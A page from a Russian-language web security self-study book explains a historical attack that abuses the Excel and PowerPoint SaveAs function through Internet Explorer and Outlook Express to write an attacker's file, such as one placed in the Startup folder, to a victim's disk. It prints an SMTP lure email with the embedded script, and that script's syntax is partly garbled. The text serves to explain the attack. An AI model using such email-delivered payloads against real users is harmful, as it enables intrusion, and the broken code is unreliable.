Иллюстрированный самоучитель по Secure Web


Запись вложений на диск без участия пользователя


До сих пор речь шла о различных механизмах запуска файлов, которые можно обманным путем поместить на удаленный диск пользователя. Описанные выше виды взлома были рассчитаны на определенные исполняемые файлы (расположенные либо на удаленном сервере, либо на диске пользователя), выполняющие свою грязную работу. А что, если взломщик имеет возможность записывать на диск выбранной жертвы свои файлы? Пользуясь этим, можно разработать завершенный способ доставки в систему пользователя и запуска в ней файлов, реализующих взлом.

Перехват функции Save As программ Excel и PowerPoint


Фокус, лежащий в основе этого взлома, был придуман Георгием Гунински, который остроумно воспользовался функцией SaveAs программ Excel и PowerPoint. Как только документ Office с помощью дескриптора OBJECT вызывается в программе Internet Explorer (об этом уже упоминалось выше), появляется возможность сохранить данные в произвольном месте диска. В своей реализации этой идеи Георгий сохраняет данные, извлеченные из файла Bookl.xi.r-. Он является обычным файлом в формате Excel с расширением .xla. Если такой файл поместить в папку Startup, то во время загрузки системы он будет запущен.

В следующем примере приведен слегка измененный код Георгия, помешенный в уже знакомую капсулу для взлома электронной почты.

helo somedomain.com

mail from: <mallory@attack.net>

rcpt to: <hapless@victim.net>

data

subject: Check this out!

Importance: high

MIME-Version: 1.0

Content-Type: text/html; charset=us-ascii

<HTML>

<h2>Enticing message here!</h2>

id="shl" width=0

height=0>

</object>

<SCRIPT>

function f()

{

fn=" D:\\test\\georgi-xla.hta";

shl.object.SaveAs(fn,6);

alert(fn+" successfully written"};

}

setTimeout{"f()",5000);

</SCRIPT>

</HTML>

quit

Написанный Георгием код расположен между дескрипторами <object> и </SCRlPT>. Изменения внесены таким образом, чтобы указать полный адрес URL файла Bookl.xla (в первоначальной реализации этот файл был доступен непосредственно на Web-сервере). Содержимое Bookl.xla записывается в файл, указанный в строке fn=. Из исходного кода Георгия удалены также строки комментариев, в которых указано, как сохранить этот файл (предполагается, что об этом нетрудно догадаться). Просмотр этого сообщения в программе Outlook Express системы NT4 с зоной, для которой задан уровень безопасности Low, приведет к неожиданному появлению на короткое время окна передачи файла, вслед за которым появится следующее сообщение.




Начало  Назад  Вперед



Книжный магазин